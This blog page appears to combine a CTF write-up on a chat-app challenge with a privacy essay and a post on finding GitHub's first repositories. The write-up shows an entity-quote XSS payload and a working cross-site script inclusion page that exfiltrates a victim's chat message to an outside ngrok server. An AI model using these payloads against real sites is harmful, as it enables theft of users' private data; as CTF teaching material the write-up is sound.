Abhay Rana aka Capt. Nemo

ECTF-14 Web400 Writeup

We recently participated in ECTF-14 and it was a great experience. Here's a writeup of the web400 challenge:

Problem Statement

The chat feature was added to Facelook website and to test it, founder of the company had sent a message in chat to the admin. Admin reads all the chat messages, but does not reply to anyone. Try to get that chat message and earn the bounty. Annoying Admin

The challenge consisted of a simple signup and a chat feature, where anyone could send a chat message to anyone. On the receiving side, however, the chat messages were loaded using JavaScript. The code for loading the messages looked like this:

function load_messages(id) {
  $.ajax({
    url: "http://212.71.235.214:4050/chat",
    data: {
      sender: id,
    },
    success: function(response) {
      eval(response);
    }
  });
}

The URL above responded with the following:

$('#chat_234').html('');$('#chat_234').append('dream<br />');

Here, dream was the message I had sent. My first attempt was to break out of the append call and execute my own JavaScript by trivially using a single quote. Unfortunately, the single quote was stripped out by the backend.

Next, I tried using the HTML entity &#x27; instead of a literal single quote, and it worked:

Message sent: &#x27;+alert(1)+&#x27;

Message received: $('#chat_234').html('');$('#chat_234').append('dream<br />');$('#chat_234').append(''+alert(1)+'<br />');
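
This behavior suggests the backend stripped literal quotes first and decoded HTML entities afterwards. Here's a hypothetical sketch that reproduces what we observed (the real server code was never visible to us):

// Hypothetical reconstruction of the backend's flawed sanitization --
// the actual code was not visible; this just matches the observed behavior.
function sanitize(message) {
  // Literal single quotes are stripped (this blocked the first attempt)...
  var stripped = message.replace(/'/g, '');
  // ...but HTML entities are decoded afterwards, reintroducing the quote.
  return stripped.replace(/&#x27;/gi, "'");
}

sanitize("'+alert(1)+'");           // returns "+alert(1)+"  (quotes stripped)
sanitize("&#x27;+alert(1)+&#x27;"); // returns "'+alert(1)+'" (injection survives)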

This seemed simple enough to exploit as XSS, so I quickly wrote up my exploit:

$.get('/chat?sender=2', function(data){ $.post("http://my-server.com/ectf/index.php", {content: data}); });

This relied on the fact that we knew the founder's user id to be 2. The code worked perfectly fine with my test accounts, but something weird happened when the challenge server (admin) ran it: I would get a GET request on the above-mentioned URL instead of a POST. Attempting to build the URL dynamically, whether with concat, +, or any other operator, as in "http://my-server.com/index.php?data="+document.cookie, resulted in a request to http://my-server.com/index.php?data=. Anything I appended was simply ignored.

After spending a long time trying to get a POST request out with cookie or session data, I realized that the intended attack was not XSS but a CSRF-style one (specifically, cross-site script inclusion). The chat data was being served as executable JavaScript rather than JSON, and JavaScript requests (via a script tag) can be made across domains. That meant any website could read the data by including the proper script tag: one with its src set to http://212.71.235.214:4050/chat?sender=2. Executing the response would automatically add the chat message to a div with id chat_2.
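
In its simplest form, the inclusion looks something like this (jQuery has to be loaded first, since the server's response calls $):

<!-- Sketch of a bare cross-domain script include: the victim's browser
     attaches its cookies to the request, and the evaluated response
     fills #chat_2 on our page. -->
<div id="chat_2"></div>
<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
<script src="http://212.71.235.214:4050/chat?sender=2"></script>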

The only remaining requirement was that the admin visit our site with the proper cookies, and we already knew the admin was sniffing for links and visiting them. So I wrote up my second (this time working) exploit:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>ECTF14 web400 exploit</title>
</head>
<body>
  <!-- The included script appends the founder's message into #chat_2 -->
  <div id="chat_2"></div>
  <div id="chat_106"></div>
  <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
  <script>
    $(document).ready(function(){
      // Load the chat endpoint as a cross-domain script; the admin's
      // cookies are sent along with the request
      $.getScript("http://212.71.235.214:4050/chat?sender=2");
      // Give the script a second to run, then exfiltrate the message text
      setTimeout(function(){
        var text = $('#chat_2').text();
        $.post('http://20c7d53b.ngrok.com/', {content: text});
      }, 1000);
    });
  </script>
</body>
</html>

Unfortunately, the exploit did not work in Chrome, which refused to run the response as JavaScript because it was being served with a MIME type of text/html. It did work in Firefox, and I crossed my fingers as I sent the admin a link to the above page in a chat message. I knew the admin was using PhantomJS to run my JavaScript (from the User-Agent header in the numerous GET requests I had received earlier), so I was hopeful this would work.

I was listening at the URL, and sure enough, as soon as I sent out the link to this page, the admin ran my JavaScript and I got the flag in a POST request.

The flag was bad_js_is_vulnerable.

Living a public life as a privacy advocate

If you've known me for a while, you might know me as a privacy-conscious individual, or perhaps as someone who leads a very public life. The truth is that I lead both of these lives; and while that may sound oxymoronic to some, it's perfectly clear to me.

I'm a huge privacy advocate. I still remember the day I woke up and read about PRISM first thing in the morning. My reaction was a mix of disbelief, anger, and frustration. In the aftermath of the PRISM reveal, I made a few choices: I would retain ownership of my data, and I would do whatever I could to promote tools that help others do the same.

I'm still working on both fronts, but the reality of the situation is that we are surrounded by walled gardens. I decided to make the best I could of these gardens. I remember reading a strange suggestion somewhere: only post public stuff on Facebook. Somehow, I was convinced to try it out.

But I took the experiment a step further: if a service is not something I can control myself (say, by self-hosting), then everything I do on it should be fit for public viewing. Since then, I've rarely posted anything private on Facebook.

Other services where I follow the same advice include:

  • Goodreads - Whatever I read is public information, along with real-time updates of my reading habits.
  • Last.FM - All of my music tastes, along with real-time updates on what I'm listening to.
  • Facebook - All of my posts on Facebook are public. I do have some private messaging conversations on Facebook (I never initiate them), and I usually move them to email if they become important.
  • Twitter - Tiny byte-sized thoughts and observations are, again, public. My account is set to public, which doesn't mean that I trust Twitter with my data; it just means that I expect my data to be public.
  • GitHub - One of the few companies I trust to keep my data safe. Barring a few exceptions, everything I do on GitHub is public, ready for anyone to analyze and use as public data. In fact, GitHub makes all of its timeline data available to the public as a dataset on BigQuery.
  • Bookmarks - Most of my bookmarks are public via XMarks. I haven't synced them in a while, since XMarks and Chrome Sync don't work well together, but I plan to do something about this as well.

Along with all this, most of the writing I do these days is for public consumption, either via my blog or on platforms like Quora, StackExchange, and Medium.

Why

My reasoning behind keeping all of my online life public is twofold:

  1. This creates a public archive of my life, accessible to everyone.
  2. It doesn't give me an illusion of privacy when there is none.

In reference to (1) above, I recently set up Google's Inactive Account Manager, and I have to commend Google on the execution of the concept. Be sure to check it out at https://www.google.com/settings/account/inactive.

Disadvantages

This lifestyle choice is not without its drawbacks. Stalking me, for example, is very easy. So, probably, is impersonating me. However, these are risks I'm willing to take in order to lead a public life.

Exceptions

By now you might be thinking of me as a pro-Facebook, share-everything kind of guy. But that's not completely true. I do have clear limits on what counts as public and what does not. I value my privacy (and that of those close to me) very dearly.

For instance, I count my photographs as something very private. I almost never post public updates anywhere with my picture in them. Perhaps it's because I never had a phone with a decent camera. Whatever the reason, I try really hard to keep my pictures off the internet.

Another related issue is when an update would involve someone besides me. For example, my sister recently got engaged, and I didn't go on a social update spree telling the whole world about it, because I value her privacy.

My simple rule of thumb is to ask for permission rather than beg for forgiveness, as another person's privacy is far more important.

What was the first project on GitHub?

Note: This is cross-posted from Quora, where I initially wrote this answer.

The first project on GitHub was grit. How do I know this? Just some clever use of GitHub search and the API.

Here's a GitHub search that shows the first 10 projects created on GitHub. The search uses the created qualifier to look for repositories created before 15 Jan 2008.
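
Assuming the search syntax hasn't changed since, the qualifier is along these lines:

created:<2008-01-15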

They are, in order of creation, with the numeric id of each repo in brackets:

  1. mojombo/grit (1)

    Grit gives you object oriented read/write access to Git repositories via Ruby. Deprecated in favor of libgit2/rugged.

  2. wycats/merb-core (26)

    Merb Core: All you need. None you don't. Merb was an early Ruby framework that was later merged into Rails. No longer maintained.

  3. rubinius/rubinius (27)

    Rubinius, the Ruby Environment. Still under active development.

  4. mojombo/god (28)

    God is an easy to configure, easy to extend monitoring framework written in Ruby. Still actively maintained, and used by GitHub internally as well, I think.

  5. vanpelt/jsawesome (29)

    JSAwesome provides a powerful JSON based DSL for creating interactive forms. Its last update was in 2008

  6. wycats/jspec (31)

    A JavaScript BDD Testing Library. No longer maintained.

  7. defunkt/exception_logger (35)

    The Exception Logger logs your Rails exceptions in the database and provides a funky web interface to manage them. No longer maintained.

  8. defunkt/ambition (36)
  9. technoweenie/restful-authentication (42)

    Generates common user authentication code for Rails/Merb, with a full test/unit and rspec suite and optional Acts as State Machine support built-in. Maintained till Aug 2011.

  10. technoweenie/attachment_fu (43)

    Treat an ActiveRecord model as a file attachment, storing its path, size, content type, etc.

I'm sure the ids from 2-25 were taken up by internal GitHub projects, such as github/github. To get the numeric id of a repo, visit https://api.github.com/repos/mojombo/grit and change the URL accordingly.
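
If you want to script the lookup, here's a minimal sketch against that same public endpoint (written for Node 18+, which ships a global fetch; no authentication is needed for public repos, though unauthenticated requests are rate-limited):

// Look up a repository's numeric id via the public GitHub API.
async function repoId(fullName) {
  const res = await fetch('https://api.github.com/repos/' + fullName);
  if (!res.ok) throw new Error('GitHub API returned ' + res.status);
  const repo = await res.json();
  return repo.id;
}

repoId('mojombo/grit').then(id => console.log(id)); // prints 1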